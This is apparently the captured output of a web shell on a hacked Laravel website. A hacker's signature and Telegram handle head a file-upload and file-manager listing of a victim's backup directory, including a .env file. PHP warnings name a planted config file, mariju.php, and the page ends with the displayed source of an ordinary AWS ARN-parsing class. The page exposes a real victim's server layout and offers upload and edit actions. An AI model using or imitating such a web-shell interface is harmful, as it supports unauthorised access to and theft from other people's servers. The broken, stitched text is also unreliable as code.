telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log23548694 KBJuly 18 2025 23:43:000644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
null, 'partition' => null, 'service' => null, 'region' => null, 'account_id' => null, 'resource' => null, ]; $length = strlen($string); $lastDelim = 0; $numComponents = 0; for ($i = 0; $i < $length; $i++) { if (($numComponents < 5 && $string[$i] === ':')) { // Split components between delimiters $data[key($data)] = substr($string, $lastDelim, $i - $lastDelim); // Do not include delimiter character itself $lastDelim = $i + 1; next($data); $numComponents++; } if ($i === $length - 1) { // Put the remainder in the last component. if (in_array($numComponents, [5])) { $data['resource'] = substr($string, $lastDelim); } else { // If there are < 5 components, put remainder in current // component. $data[key($data)] = substr($string, $lastDelim); } } } return $data; } public function __construct($data) { if (is_array($data)) { $this->data = $data; } elseif (is_string($data)) { $this->data = static::parse($data); } else { throw new InvalidArnException('Constructor accepts a string or an' . ' array as an argument.'); } static::validate($this->data); } public function __toString() { if (!isset($this->string)) { $components = [ $this->getPrefix(), $this->getPartition(), $this->getService(), $this->getRegion(), $this->getAccountId(), $this->getResource(), ]; $this->string = implode(':', $components); } return $this->string; } public function getPrefix() { return $this->data['arn']; } public function getPartition() { return $this->data['partition']; } public function getService() { return $this->data['service']; } public function getRegion() { return $this->data['region']; } public function getAccountId() { return $this->data['account_id']; } public function getResource() { return $this->data['resource']; } public function toArray() { return $this->data; } /** * Minimally restrictive generic ARN validation * * @param array $data */ protected static function validate(array $data) { if ($data['arn'] !== 'arn') { throw new InvalidArnException("The 1st component of an ARN must be" . " 'arn'."); } if (empty($data['partition'])) { throw new InvalidArnException("The 2nd component of an ARN" . " represents the partition and must not be empty."); } if (empty($data['service'])) { throw new InvalidArnException("The 3rd component of an ARN" . " represents the service and must not be empty."); } if (empty($data['resource'])) { throw new InvalidArnException("The 6th component of an ARN" . " represents the resource information and must not be empty." . " Individual service ARNs may include additional delimiters" . " to further qualify resources."); } } protected static function validateAccountId($data, $arnName) { if (!self::isValidHostLabel($data['account_id'])) { throw new InvalidArnException("The 5th component of a {$arnName}" . " is required, represents the account ID, and" . " must be a valid host label."); } } protected static function validateRegion($data, $arnName) { if (empty($data['region'])) { throw new InvalidArnException("The 4th component of a {$arnName}" . " represents the region and must not be empty."); } } /** * Validates whether a string component is a valid host label * * @param $string * @return bool */ protected static function isValidHostLabel($string) { if (empty($string) || strlen($string) > 63) { return false; } if ($value = preg_match("/^[a-zA-Z0-9-]+$/", $string)) { return true; } return false; } }